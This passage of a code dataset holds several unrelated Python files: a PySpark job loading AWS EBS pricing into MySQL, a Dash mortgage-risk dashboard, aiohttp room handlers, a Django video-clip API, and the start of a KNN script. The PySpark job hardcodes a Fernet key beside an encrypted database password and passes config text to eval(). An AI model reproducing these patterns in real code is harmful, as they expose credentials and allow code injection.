Amazon_EBS():\r\n key = b'dmnTQwD6a-YiyO8XgQTTnTQFH3xYSrFMTzpBrL2spIA='\r\n fernet = Fernet(key)\r\n enc_pwd = b'gAAAAABhVrNOKQEgiJyBIyL4QED2zocoz-NBhmVkrxkgtAvW9KrdLW708lLAOj_pLajlEBuBmtNLXwnNy5UGm5vGGtTnuHFdTQ=='\r\n dec_pwd = fernet.decrypt(enc_pwd).decode()\r\n contents = open(\"C:/Users/mkhan369/PycharmProjects/Spark_Examples/venv/Include/spark-warehouse/Sample/CONFIG_LOADER/config.txt\").read()\r\n c = json.loads(contents)\r\n dict1 = []\r\n f = open(\"C:/Users/mkhan369/PycharmProjects/Spark_Examples/venv/Include/spark-warehouse/Sample/CONFIG_LOADER/EBS.json\",\"r\")\r\n x1 = json.load(f)\r\n dict1.append(x1)\r\n spark = SparkSession.builder.appName('Clou_pricing_API').config(\"spark.jars\", \"file:///C:/Users/mkhan369/Downloads/mysql-connector-java-8.0.26/mysql-connector-java-8.0.26.jar\").getOrCreate()\r\n m1 = spark.createDataFrame(data=dict1, schema=eval(c['EBSschema']))\r\n s1 = m1.select(F.explode(\"products\"))\r\n s1.createOrReplaceTempView(\"test\")\r\n products = spark.sql(\r\n \"\"\"select key, value['sku'] as sku, value['productFamily'] as product_Family, value['attributes']['location'] as location, value['attributes']['storageMedia'] as\r\n storageMedia, value['attributes']['volumeType'] as volumeType, value['attributes']['maxVolumeSize'] as maxVolumeSize, value['attributes']['marketoption'] as termtype, value['attributes']['maxIopsvolume'] as maxIopsvolume,\r\n value['attributes']['maxThroughputvolume'] as maxThroughputvolume, value['attributes']['maxIopsBurstPerformance'] as IopsBurstPerformance, value['attributes']['volumeApiName'] as volumeApiName from test \"\"\")\r\n df = m1.select(explode('terms.OnDemand')).select(explode('value')).select('value.*',explode('value.priceDimensions').alias('x', 'y')).select('sku','effectiveDate',\r\n col('y.unit').alias('unit'), col('y.description').alias('Price_description'),explode('y.pricePerUnit').alias( 'Currency','pricePerUnit'))\r\n finaldf = df.withColumn('created_on', F.lit(\"2021-09-01 15:33:34.405099\")).withColumn('Updated_On',F.current_timestamp()).withColumn('Created_by', F.lit(\"Group_2@gmail.com\")).withColumn(\"Updated_by\", F.lit(\"Group_2\"))\r\n EBSpricing = finaldf.join(products, 'sku')\r\n EBSpricing = EBSpricing.select('*').where(EBSpricing.product_Family == 'Storage')\r\n w = Window().orderBy('sku')\r\n EBSpricing = EBSpricing.withColumn(\"pricing_aws_ebs_id\", row_number().over(w))\r\n EBSpricing.createOrReplaceTempView(\"data\")\r\n final=spark.sql(\"select pricing_aws_ebs_id,maxVolumeSize,sku as key,Price_description,IopsBurstPerformance,unit,Currency,pricePerUnit,location,\\\r\n storageMedia,volumeType,termtype,maxThroughputvolume,volumeApiName,effectiveDate,created_on,Created_by,Updated_On,Updated_by from data\")\r\n final.show(truncate=0)\r\n final.repartition(1).write.csv(c[\"outputEBS\"],header=True)\r\n final.write.mode(\"overwrite\").format(\"jdbc\").option(\"url\", \"jdbc:mysql://localhost:3306/pricing_api?useSSL=false\").option(\r\n \"driver\", \"com.mysql.jdbc.Driver\").option(\"dbtable\", c[\"mysql\"][\"tableAM_EBS\"]).option(\"user\",c[\"mysql\"][\"rootAM_EBS\"]).option(\"password\",dec_pwd).save()\r\n print(\"!!!!!!!!!!!!!!!!!!!!!!successfully stored in mysql!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\r\n# if __name__ ==\"__main__\":\r\n# Amazon_EBS()","sub_path":"Services/AWS_EBS.py","file_name":"AWS_EBS.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498954749","text":"# -*- coding: utf-8 -*-\nimport time\nimport os\nimport json\nimport gzip\nimport shutil\nimport requests\nimport numpy as np\nimport pyarrow as pa\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport dash_daq as daq\nfrom plotly.colors import sequential\n\nfrom dask import delayed\nfrom distributed import Client\nfrom dask_cuda import LocalCUDACluster\n\nimport cudf\nimport cupy\n\n# Disable cupy memory pool so that cupy immediately releases GPU memory\ncupy.cuda.set_allocator(None)\n\n# Colors\nbgcolor = \"#191a1a\" # mapbox dark map land color\ntext_color = \"#cfd8dc\" # Material blue-grey 100\nmapbox_land_color = \"#343332\"\n\n# Figure template\nrow_heights = [150, 440, 200]\ntemplate = {\n 'layout': {\n 'paper_bgcolor': bgcolor,\n 'plot_bgcolor': bgcolor,\n 'font': {'color': text_color},\n \"margin\": {\"r\": 0, \"t\": 30, \"l\": 0, \"b\": 20},\n 'bargap': 0.05,\n 'xaxis': {'showgrid': False, 'automargin': True},\n 'yaxis': {'showgrid': True, 'automargin': True,\n 'gridwidth': 0.5, 'gridcolor': mapbox_land_color},\n }\n}\n\n\n# Load mapbox token from environment variable or file\ntoken = os.getenv('MAPBOX_TOKEN')\nif not token:\n token = open(\".mapbox_token\").read()\n\n# geojson URL\nzip3_url = 'https://raw.githubusercontent.com/rapidsai/cuxfilter/GTC-2018-mortgage-visualization/javascript/demos/GTC%20demo/src/data/zip3-ms-rhs-lessprops.json'\n\n# Download geojson so we can read all of the zip3 codes we have\nresponse = requests.get(zip3_url)\nzip3_json = json.loads(response.content.decode())\nvalid_zip3s = {int(f['properties']['ZIP3']) for f in zip3_json[\"features\"]}\n\n\n# Names of float columns\nfloat_columns = [\n 'current_actual_upb', 'dti', 'borrower_credit_score', 'delinquency_12_prediction'\n]\n\ncolumn_labels = {\n 'delinquency_12_prediction': 'Risk Score',\n 'borrower_credit_score': 'Borrower Credit Score',\n 'current_actual_upb': 'Unpaid Balance',\n 'dti': 'Debt to Income Ratio',\n}\n\n\ndef load_dataset(path):\n \"\"\"\n Args:\n path: Path to arrow file containing mortgage dataset\n\n Returns:\n pandas DataFrame\n \"\"\"\n # Load dataset as pyarrow table\n reader = pa.RecordBatchStreamReader(path)\n pa_table = reader.read_all()\n\n # Convert to pandas DataFrame\n pd_df = pa_table.to_pandas()\n\n # Convert zip to int16\n pd_df['zip'] = pd_df['zip'].astype('int16')\n\n # drop extra columns\n pd_df.drop(['loan_id', 'seller_name'], axis=1, inplace=True)\n\n return pd_df\n\n\ndef compute_bounds(df, columns):\n \"\"\"\n Compute the min/max bounds of select columns in a DataFrame\n Args:\n df: pandas or cudf DataFrame\n columns: list of columns to compute bounds on\n\n Returns:\n dict from input columns to (min, max) tuples\n \"\"\"\n return {c: (df[c].min(), df[c].max()) for c in columns}\n\n\n# Build Dash app and initial layout\ndef blank_fig(height):\n \"\"\"\n Build blank figure with the requested height\n Args:\n height: height of blank figure in pixels\n Returns:\n Figure dict\n \"\"\"\n return {\n 'data': [],\n 'layout': {\n 'height': height,\n 'template': template,\n 'xaxis': {'visible': False},\n 'yaxis': {'visible': False},\n }\n }\n\n\napp = dash.Dash(__name__)\napp.layout = html.Div(children=[\n html.Div([\n html.H1(children=[\n 'Mortgage Risk Model',\n html.A(\n html.Img(\n src=\"assets/dash-logo.png\",\n style={'float': 'right', 'height': '50px', 'margin-right': '2%'}\n ), href=\"https://dash.plot.ly/\"),\n ], style={'text-align': 'left'}),\n ]),\n html.Div(children=[\n html.Div(children=[\n html.Div(children=[\n html.H4([\n \"Selected Mortgages\",\n ], className=\"container_title\"),\n dcc.Loading(\n dcc.Graph(\n id='indicator-graph',\n figure=blank_fig(row_heights[0]),\n config={'displayModeBar': False},\n ),\n style={'height': row_heights[0]},\n ),\n html.Div(children=[\n html.Button(\n \"Clear All Selections\", id='clear-all', className='reset-button'\n ),\n ]),\n ], className='six columns pretty_container', id=\"indicator-div\"),\n html.Div(children=[\n html.H4([\n \"Configuration\",\n ], className=\"container_title\"),\n html.Table([\n html.Col(style={'width': '100px'}),\n html.Col(),\n html.Col(),\n html.Tr([\n html.Td(\n html.Div(\"GPU\"), className=\"config-label\"\n ),\n html.Td(daq.DarkThemeProvider(daq.BooleanSwitch(\n on=True,\n color='#00cc96',\n id='gpu-toggle',\n ))),\n html.Td(html.Button(\n \"Reset GPU\", id='reset-gpu', style={'width': '100%'}\n )),\n html.Div(id='reset-gpu-complete', style={'display': 'hidden'})\n ]),\n html.Tr([\n html.Td(html.Div(\"Color by\"), className=\"config-label\"),\n html.Td(dcc.Dropdown(\n id='aggregate-dropdown',\n options=[\n {'label': agg, 'value': agg}\n for agg in ['count', 'mean', 'min', 'max']\n ],\n value='count',\n searchable=False,\n clearable=False,\n )),\n html.Td(dcc.Dropdown(\n id='aggregate-col-dropdown',\n value='delinquency_12_prediction',\n searchable=False,\n clearable=False,\n )),\n ]),\n html.Tr([\n html.Td(html.Div(\"Colormap\"), className=\"config-label\"),\n html.Td(dcc.Dropdown(\n id='colorscale-dropdown',\n options=[\n {'label': cs, 'value': cs}\n for cs in ['Viridis', 'Cividis', 'Inferno', 'Magma', 'Plasma']\n ],\n value='Viridis',\n searchable=False,\n clearable=False,\n )),\n html.Td(dcc.Dropdown(\n id='colorscale-transform-dropdown',\n options=[{'label': t, 'value': t}\n for t in ['linear', 'sqrt', 'cbrt', 'log']],\n value='linear',\n searchable=False,\n clearable=False,\n )),\n ]),\n html.Tr([\n html.Td(html.Div(\"Bin Count\"), className=\"config-label\"),\n html.Td(dcc.Slider(\n id='nbins-slider',\n min=10,\n max=40,\n step=5,\n value=20,\n marks={m: str(m) for m in range(10, 41, 5)},\n included=False,\n ), colSpan=2),\n ])\n ], style={'width': '100%', 'height': f'{row_heights[0] + 40}px'}),\n ], className='six columns pretty_container', id=\"config-div\"),\n ]),\n html.Div(children=[\n html.H4([\n \"Zip Codes\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='map-graph',\n figure=blank_fig(row_heights[1]),\n ),\n html.Button(\"Clear Selection\", id='reset-map', className='reset-button'),\n ], className='twelve columns pretty_container',\n style={\n 'width': '98%',\n 'margin-right': '0',\n },\n id=\"map-div\"\n ),\n html.Div(children=[\n html.Div(\n children=[\n html.H4([\n \"Risk Score\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='delinquency-histogram',\n config={'displayModeBar': False},\n figure=blank_fig(row_heights[2]),\n animate=True\n ),\n html.Button(\n \"Clear Selection\", id='clear-delinquency', className='reset-button'\n ),\n ],\n className='six columns pretty_container', id=\"delinquency-div\"\n ),\n html.Div(\n children=[\n html.H4([\n \"Borrower Credit Score\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='credit-histogram',\n config={'displayModeBar': False},\n figure=blank_fig(row_heights[2]),\n animate=True\n ),\n html.Button(\n \"Clear Selection\", id='clear-credit', className='reset-button'\n ),\n ],\n className='six columns pretty_container', id=\"credit-div\"\n ),\n ]),\n html.Div(children=[\n html.Div(\n children=[\n html.H4([\n \"Unpaid Balance\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='upb-histogram',\n figure=blank_fig(row_heights[2]),\n config={'displayModeBar': False},\n animate=True\n ),\n html.Button(\n \"Clear Selection\", id='clear-upb', className='reset-button'\n ),\n ],\n className='six columns pretty_container', id=\"upb-div\"\n ),\n html.Div(\n children=[\n html.H4([\n \"Debt to Income Ratio\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='dti-histogram',\n figure=blank_fig(row_heights[2]),\n config={'displayModeBar': False},\n animate=True\n ),\n html.Button(\n \"Clear Selection\", id='clear-dti', className='reset-button'\n ),\n ],\n className='six columns pretty_container', id=\"dti-div\"\n ),\n ]),\n ]),\n html.Div(\n [\n html.H4('Acknowledgements', style={\"margin-top\": \"0\"}),\n dcc.Markdown('''\\\n - Dashboard written in Python using the [Dash](https://dash.plot.ly/) web framework.\n - GPU accelerated provided by the [cudf](https://github.com/rapidsai/cudf) and\n [cupy](https://cupy.chainer.org/) libraries.\n - Base map layer is the [\"dark\" map style](https://www.mapbox.com/maps/light-dark/)\n provided by [mapbox](https://www.mapbox.com/).\n'''),\n ],\n style={\n 'width': '98%',\n 'margin-right': '0',\n 'padding': '10px',\n },\n className='twelve columns pretty_container',\n ),\n])\n\n# Register callbacks\n@app.callback(\n [Output('aggregate-col-dropdown', 'options'),\n Output('aggregate-col-dropdown', 'disabled')],\n [Input('aggregate-dropdown', 'value')]\n)\ndef update_agg_col_dropdown(agg):\n if agg == 'count':\n options = [{'label': 'NA',\n 'value': 'NA'}]\n disabled = True\n else:\n options = [{'label': v, 'value': k} for k, v in column_labels.items()]\n disabled = False\n return options, disabled\n\n\n# Clear/reset button callbacks\n@app.callback(\n Output('map-graph', 'selectedData'),\n [Input('reset-map', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_map(*args):\n return None\n\n\n@app.callback(\n Output('dti-histogram', 'selectedData'),\n [Input('clear-dti', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_dti_hist_selections(*args):\n return None\n\n\n@app.callback(\n Output('credit-histogram', 'selectedData'),\n [Input('clear-credit', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_credit_hist_selections(*args):\n return None\n\n\n@app.callback(\n Output('upb-histogram', 'selectedData'),\n [Input('clear-upb', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_upb_hist_selection(*args):\n return None\n\n\n@app.callback(\n Output('delinquency-histogram', 'selectedData'),\n [Input('clear-delinquency', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_delinquency_hist_selection(*args):\n return None\n\n\n# Query string helpers\ndef bar_selection_to_query(selection, column, bounds, nbins):\n \"\"\"\n Compute pandas query expression string for selection callback data\n\n Args:\n selection: selectedData dictionary from Dash callback on a bar trace\n column: Name of the column that the selected bar chart is based on\n bounds: Dictionary from columns to (min, max) tuples\n nbins: Number of histogram bins\n\n Returns:\n String containing a query expression compatible with DataFrame.query. This\n expression will filter the input DataFrame to contain only those rows that\n are contained in the selection.\n \"\"\"\n point_inds = [p['pointIndex'] for p in selection['points']]\n bin_edges = np.linspace(*bounds[column], nbins)\n xmin = bin_edges[min(point_inds)]\n xmax = bin_edges[max(point_inds) + 1]\n xmin_op = \"<=\"\n xmax_op = \"<=\" if xmax == bin_edges[-1] else \"<\"\n return f\"{xmin} {xmin_op} {column} and {column} {xmax_op} {xmax}\"\n\n\ndef build_query(selections, exclude=None):\n \"\"\"\n Build pandas query expression string for cross-filtered plot\n\n Args:\n selections: Dictionary from column name to query expression\n exclude: If specified, column to exclude from combined expression\n\n Returns:\n String containing a query expression compatible with DataFrame.query.\n \"\"\"\n other_selected = {sel for c, sel in selections.items() if c != exclude}\n if other_selected:\n return ' and '.join(other_selected)\n else:\n return None\n\n\n# Plot functions\ndef build_colorscale(colorscale_name, transform):\n \"\"\"\n Build plotly colorscale\n\n Args:\n colorscale_name: Name of a colorscale from the plotly.colors.sequential module\n transform: Transform to apply to colors scale. One of 'linear', 'sqrt', 'cbrt',\n or 'log'\n\n Returns:\n Plotly color scale list\n \"\"\"\n colors = getattr(sequential, colorscale_name)\n if transform == \"linear\":\n scale_values = np.linspace(0, 1, len(colors))\n elif transform == \"sqrt\":\n scale_values = np.linspace(0, 1, len(colors)) ** 2\n elif transform == \"cbrt\":\n scale_values = np.linspace(0, 1, len(colors)) ** 3\n elif transform == \"log\":\n scale_values = (10 ** np.linspace(0, 1, len(colors)) - 1) / 9\n else:\n raise ValueError(\"Unexpected colorscale transform\")\n return [(v, clr) for v, clr in zip(scale_values, colors)]\n\n\ndef build_choropleth(\n df, aggregate, aggregate_column, colorscale_name, colorscale_transform, selected_zips\n):\n \"\"\"\n Build choropleth figure\n\n Args:\n df: pandas or cudf DataFrame\n aggregate: Aggregate operation (count, mean, etc.)\n aggregate_column: Column to perform aggregate on. Ignored for 'count' aggregate\n colorscale_name: Name of plotly colorscale\n colorscale_transform: Colorscale transformation\n clear_selection: If true, clear choropleth selection. Otherwise leave\n selection unchanged\n\n Returns:\n Choropleth figure dictionary\n \"\"\"\n # Perform aggregation\n if aggregate == \"count\":\n zip_aggregates = df.groupby('zip').zip.count()\n else:\n grouper = df.groupby('zip')[aggregate_column]\n zip_aggregates = getattr(grouper, aggregate)()\n\n if isinstance(df, cudf.DataFrame):\n zip_aggregates = zip_aggregates.to_pandas()\n\n # Filter down to zip codes that we have geojson for\n zip_aggregates = zip_aggregates[zip_aggregates.index.isin(valid_zip3s)]\n\n # Build zero-padded zip3 strings\n zip_strs = zip_aggregates.index.astype(str).str.zfill(3)\n\n # Build colorscale\n colorscale = build_colorscale(colorscale_name, colorscale_transform)\n\n # Compute selected points\n if selected_zips is None:\n selectedpoints = None\n else:\n selected_mask = zip_aggregates.index.isin(selected_zips)\n selectedpoints = np.nonzero(selected_mask)[0]\n\n if aggregate == \"count\":\n colorbar_title = aggregate\n else:\n column_label = column_labels[aggregate_column]\n colorbar_title = f\"{aggregate}({column_label})\"\n\n # Build Figure\n fig = {\n \"data\": [{\n \"type\": \"choroplethmapbox\",\n \"geojson\": zip3_url,\n \"featureidkey\": \"properties.ZIP3\",\n \"locations\": zip_strs,\n \"z\": zip_aggregates.values,\n \"colorscale\": colorscale,\n \"selectedpoints\": selectedpoints,\n \"colorbar\": {\"title\": {\n \"text\": colorbar_title, \"side\": \"right\", \"font\": {\"size\": 14}\n }}\n }],\n \"layout\": {\n \"mapbox\": {\n \"style\": \"dark\",\n \"accesstoken\": token,\n \"zoom\": 3,\n \"center\": {\"lat\": 37.0902, \"lon\": -95.7129},\n 'pitch': 0,\n 'bearing': 0,\n },\n \"uirevision\": True,\n \"margin\": {\"r\": 140, \"t\": 26, \"l\": 0, \"b\": 0},\n 'template': template,\n }\n }\n\n return fig\n\n\ndef build_histogram(df, column, nbins, bounds, selections, query_cache):\n \"\"\"\n Build histogram figure\n\n Args:\n df: pandas or cudf DataFrame\n column: Column name to build histogram from\n nbins: Number of histogram bins\n bounds: Dictionary from columns to (min, max) tuples\n selections: Dictionary from column names to query expressions\n query_cache: Dict from query expression to filtered DataFrames\n\n Returns:\n Histogram figure dictionary\n \"\"\"\n query = build_query(selections, column)\n if query in query_cache:\n df = query_cache[query]\n elif query:\n df = df.query(query)\n query_cache[query] = df\n\n if isinstance(df, cudf.DataFrame):\n bin_edges = cupy.linspace(*bounds[column], nbins)\n counts = cupy.asnumpy(cupy.histogram(df[column], bin_edges)[0])\n bin_edges = cupy.asnumpy(bin_edges)\n else:\n bin_edges = np.linspace(*bounds[column], nbins)\n counts = np.histogram(df[column], bin_edges)[0]\n\n centers = (bin_edges[:-1] + bin_edges[1:]) / 2.0\n fig = {\n 'data': [{\n 'type': 'bar', 'x': centers, 'y': counts,\n 'marker': {'color': text_color}\n }],\n 'layout': {\n 'yaxis': {\n 'type': 'log',\n # 'range': [0, None],\n 'range': [0, 8], # Up to 100M\n 'title': {\n 'text': \"Count\"\n }\n },\n 'selectdirection': 'h',\n 'dragmode': 'select',\n 'template': template,\n 'uirevision': True,\n }\n }\n if column not in selections:\n fig['data'][0]['selectedpoints'] = False\n\n return fig\n\n\ndef build_updated_figures(\n df, selected_map, selected_dti, selected_credit, selected_upb,\n selected_delinquency, aggregate, aggregate_column,\n colorscale_name, colorscale_transform, nbins, bounds\n):\n \"\"\"\n Build all figures for dashboard\n\n Args:\n df: pandas or cudf DataFrame\n selected_map: selectedData for choropleth figure\n selected_dti: selectedData for dti histogram\n selected_credit: selectedData for credit history histogram\n selected_upb: selectedData for unpaid balance histogram\n selected_delinquency: selectedData for delinquency histogram\n aggregate: Aggregate operation for choropleth (count, mean, etc.)\n aggregate_column: Aggregate column for choropleth\n colorscale_name: Colorscale name from plotly.colors.sequential\n colorscale_transform: Colorscale transformation ('linear', 'sqrt', 'cbrt', 'log')\n nbins: Number of histogram bins\n bounds: Dictionary from columns to (min, max) tuples\n\n Returns:\n tuple of figures in the following order\n (choropleth, credit_histogram, delinquency_histogram,\n dti_histogram, n_selected_indicator, upb_histogram)\n \"\"\"\n selected = {\n col: bar_selection_to_query(sel, col, bounds, nbins)\n for col, sel in zip([\n 'dti', 'borrower_credit_score',\n 'current_actual_upb', 'delinquency_12_prediction'\n ], [\n selected_dti, selected_credit, selected_upb, selected_delinquency\n ]) if sel and sel.get('points', [])\n }\n\n array_module = cupy if isinstance(df, cudf.DataFrame) else np\n\n all_hists_query = build_query(selected)\n\n if selected_map:\n selected_zips = array_module.array(\n [int(p['location']) for p in selected_map['points']])\n else:\n selected_zips = None\n\n if selected_zips is not None:\n zips_array = array_module.asarray(df['zip'])\n\n # Perform isin in fixed length chunks to limit memory usage\n isin_mask = array_module.zeros(len(zips_array), dtype=np.bool)\n stride = 32\n for i in range(0, len(selected_zips), stride):\n zips_chunk = selected_zips[i:i+stride]\n isin_mask |= array_module.isin(zips_array, zips_chunk)\n df_map = df[isin_mask]\n else:\n df_map = df\n\n choropleth = build_choropleth(\n df.query(all_hists_query) if all_hists_query else df, aggregate,\n aggregate_column, colorscale_name, colorscale_transform, selected_zips)\n\n # Build indicator figure\n n_selected_indicator = {\n 'data': [{\n 'type': 'indicator',\n 'value': len(\n df_map.query(all_hists_query) if all_hists_query else df_map\n ),\n 'number': {\n 'font': {\n 'color': text_color\n }\n }\n }],\n 'layout': {\n 'template': template,\n 'height': row_heights[0],\n 'margin': {'l': 10, 'r': 10, 't': 10, 'b': 10}\n }\n }\n query_cache = {}\n delinquency_histogram = build_histogram(\n df_map, 'delinquency_12_prediction', nbins, bounds, selected, query_cache,\n )\n\n credit_histogram = build_histogram(\n df_map, 'borrower_credit_score', nbins, bounds, selected, query_cache\n )\n\n upb_histogram = build_histogram(\n df_map, 'current_actual_upb', nbins, bounds, selected, query_cache\n )\n\n dti_histogram = build_histogram(\n df_map, 'dti', nbins, bounds, selected, query_cache\n )\n\n return (choropleth, credit_histogram, delinquency_histogram,\n dti_histogram, n_selected_indicator, upb_histogram)\n\n\ndef register_update_plots_callback(client, bounds):\n \"\"\"\n Register Dash callback that updates all plots in response to selection events\n Args:\n df_d: Dask.delayed pandas or cudf DataFrame\n bounds: Dictionary from columns to (min, max) tuples\n \"\"\"\n @app.callback(\n [Output('indicator-graph', 'figure'), Output('map-graph', 'figure'),\n Output('dti-histogram', 'figure'), Output('credit-histogram', 'figure'),\n Output('upb-histogram', 'figure'), Output('delinquency-histogram', 'figure')],\n [Input('map-graph', 'selectedData'),\n Input('dti-histogram', 'selectedData'), Input('credit-histogram', 'selectedData'),\n Input('upb-histogram', 'selectedData'), Input('delinquency-histogram', 'selectedData'),\n Input('aggregate-dropdown', 'value'), Input('aggregate-col-dropdown', 'value'),\n Input('colorscale-dropdown', 'value'), Input('colorscale-transform-dropdown', 'value'),\n Input('nbins-slider', 'value'), Input('gpu-toggle', 'on')\n ]\n )\n def update_plots(\n selected_map, selected_dti, selected_credit, selected_upb, selected_delinquency,\n aggregate, aggregate_column, colorscale_name, transform, nbins, gpu_enabled\n ):\n t0 = time.time()\n\n # Get delayed dataset from client\n if gpu_enabled:\n df_d = client.get_dataset('c_df_d')\n else:\n df_d = client.get_dataset('pd_df_d')\n\n figures_d = delayed(build_updated_figures)(\n df_d, selected_map, selected_dti, selected_credit, selected_upb,\n selected_delinquency, aggregate, aggregate_column, colorscale_name,\n transform, nbins, bounds)\n\n figures = figures_d.compute()\n\n (choropleth, credit_histogram, delinquency_histogram,\n dti_histogram, n_selected_indicator, upb_histogram) = figures\n\n print(f\"Update time: {time.time() - t0}\")\n return (\n n_selected_indicator, choropleth, dti_histogram, credit_histogram,\n upb_histogram, delinquency_histogram\n )\n\n\ndef publish_dataset_to_cluster():\n # Look for dataset\n dataset_url = 'https://s3.us-east-2.amazonaws.com/rapidsai-data/viz-data/146M_predictions_v2.arrow.gz'\n\n data_path = \"./data/146M_predictions_v2.arrow\"\n if not os.path.exists(data_path):\n print(f\"Mortgage dataset not found at ./data/146M_predictions_v2.arrow.\\n\"\n f\"Downloading from {dataset_url}\")\n # Download dataset to data directory\n os.makedirs('./data', exist_ok=True)\n data_gz_path = data_path + '.gz'\n with requests.get(dataset_url, stream=True) as r:\n r.raise_for_status()\n with open(data_gz_path, 'wb') as f:\n for chunk in r.iter_content(chunk_size=8192):\n if chunk:\n f.write(chunk)\n\n print(\"Decompressing...\")\n with gzip.open(data_gz_path, 'rb') as f_in:\n with open(data_path, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n\n print(\"Deleting compressed file...\")\n os.remove(data_gz_path)\n\n print('done!')\n else:\n print(f\"Found dataset at {data_path}\")\n\n # Note: The creation of a Dask LocalCluster must happen inside the `__main__` block,\n cluster = LocalCUDACluster(CUDA_VISIBLE_DEVICES=\"0\")\n client = Client(cluster)\n print(f\"Dask status: {cluster.dashboard_link}\")\n\n # Load dataset and persist dataset on cluster\n def load_and_publish_dataset():\n # pandas DataFrame\n pd_df_d = delayed(load_dataset)(data_path).persist()\n\n # cudf DataFrame\n c_df_d = delayed(cudf.DataFrame.from_pandas)(pd_df_d).persist()\n\n # Unpublish datasets if present\n for ds_name in ['pd_df_d', 'c_df_d']:\n if ds_name in client.datasets:\n client.unpublish_dataset(ds_name)\n\n # Publish datasets to the cluster\n client.publish_dataset(pd_df_d=pd_df_d)\n client.publish_dataset(c_df_d=c_df_d)\n\n load_and_publish_dataset()\n\n # Precompute field bounds\n c_df_d = client.get_dataset('c_df_d')\n bounds = delayed(compute_bounds)(c_df_d, float_columns).compute()\n\n # Define callback to restart cluster and reload datasets\n @app.callback(\n Output('reset-gpu-complete', 'children'),\n [Input('reset-gpu', 'n_clicks')]\n )\n def restart_cluster(n_clicks):\n if n_clicks:\n print(\"Restarting LocalCUDACluster\")\n client.unpublish_dataset('pd_df_d')\n client.unpublish_dataset('c_df_d')\n client.restart()\n load_and_publish_dataset()\n\n # Register top-level callback that updates plots\n register_update_plots_callback(client, bounds)\n\n\ndef server():\n # gunicorn entry point when called with `gunicorn 'app:server()'`\n publish_dataset_to_cluster()\n return app.server\n\n\nif __name__ == '__main__':\n # development entry point\n publish_dataset_to_cluster()\n\n # Launch dashboard\n app.run_server(debug=False, dev_tools_silence_routes_logging=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":29101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"253952528","text":"from aiohttp import web\n\nimport db\nfrom utils import get_admin_logins, is_admin\n\nasync def create_room(request):\n data = await request.json()\n assert 'theme' in data\n assert 'name' in data\n if not is_admin(data):\n return web.json_response({\n 'status': 'Access denied',\n }, status=403)\n res = await db.create_room(request.app['db_pool'], data)\n return web.json_response({\n 'status': 'Succesfuly created',\n 'room_id': res['id']\n })\n\nasync def rooms(request):\n data = await db.get_rooms(request.app['db_pool'])\n return web.json_response(data)\n\nasync def room_ud(request):\n id = int(request.match_info['id'])\n data = await request.json()\n status = 'Unknow'\n if not is_admin(data):\n return web.json_response({\n 'status': 'Access denied',\n }, status=403)\n if request.method == 'DELETE':\n await db.delete_room(request.app['db_pool'], {'id': id})\n status = 'Succesfuly deleted'\n if request.method == 'PATCH':\n assert 'theme' in data\n assert 'name' in data\n data['id'] = id\n await db.update_room(request.app['db_pool'], data)\n status = 'Succesfuly updated'\n return web.json_response({'status': status})\n\nasync def admins(request):\n return web.json_response(get_admin_logins())\n\n\ndef add_routers(app):\n app.router.add_get('/admins', admins)\n app.router.add_post('/room', create_room)\n app.router.add_get('/room', rooms)\n app.router.add_route('patch', '/room/{id}', room_ud)\n app.router.add_route('delete', '/room/{id}', room_ud)\n app.router.add_static('/static', './static')\n","sub_path":"room_handlers.py","file_name":"room_handlers.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313818771","text":"import tempfile\nimport traceback\nimport hashlib\n\nfrom ..models import TemporaryFile\nfrom ..models import Media\nfrom ..serializers import TemporaryFileSerializer\nfrom ..schema import GetClipSchema\n\nfrom ._base_views import BaseDetailView\nfrom ._media_util import MediaUtil\nfrom ._permissions import ProjectViewOnlyPermission\n\nclass GetClipAPI(BaseDetailView):\n schema = GetClipSchema()\n permission_classes = [ProjectViewOnlyPermission]\n http_method_names = ['get']\n\n def get_serializer(self):\n \"\"\" This allows the AutoSchema to fill in the response details nicely\"\"\"\n return TemporaryFileSerializer()\n\n def get_queryset(self):\n return Media.objects.all()\n\n def _get(self, params):\n \"\"\" Facility to get a clip from the server. Returns a temporary file object that expires in 24 hours.\n \"\"\"\n # upon success we can return an image\n video = Media.objects.get(pk=params['id'])\n project = video.project\n frameRangesStr = params.get('frameRanges', None)\n frameRangesTuple=[frameRange.split(':') for frameRange in frameRangesStr]\n frameRanges=[]\n for t in frameRangesTuple:\n frameRanges.append((int(t[0]), int(t[1])))\n\n quality = params.get('quality', None)\n h = hashlib.new('md5', f\"{params}\".encode())\n lookup = h.hexdigest()\n\n # Check to see if we already made this clip\n matches=TemporaryFile.objects.filter(project=project, lookup=lookup)\n if matches.exists():\n temp_file = matches[0]\n else:\n with tempfile.TemporaryDirectory() as temp_dir:\n media_util = MediaUtil(video, temp_dir, quality)\n fp = media_util.getClip(frameRanges)\n\n temp_file = TemporaryFile.from_local(fp, \"clip.mp4\", project, self.request.user, lookup=lookup, hours=24)\n\n responseData = TemporaryFileSerializer(temp_file, context={\"view\": self}).data\n return responseData\n","sub_path":"main/rest/get_clip.py","file_name":"get_clip.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535094352","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom matplotlib import pyplot as plt\n\n#load dataset\ndataframe = 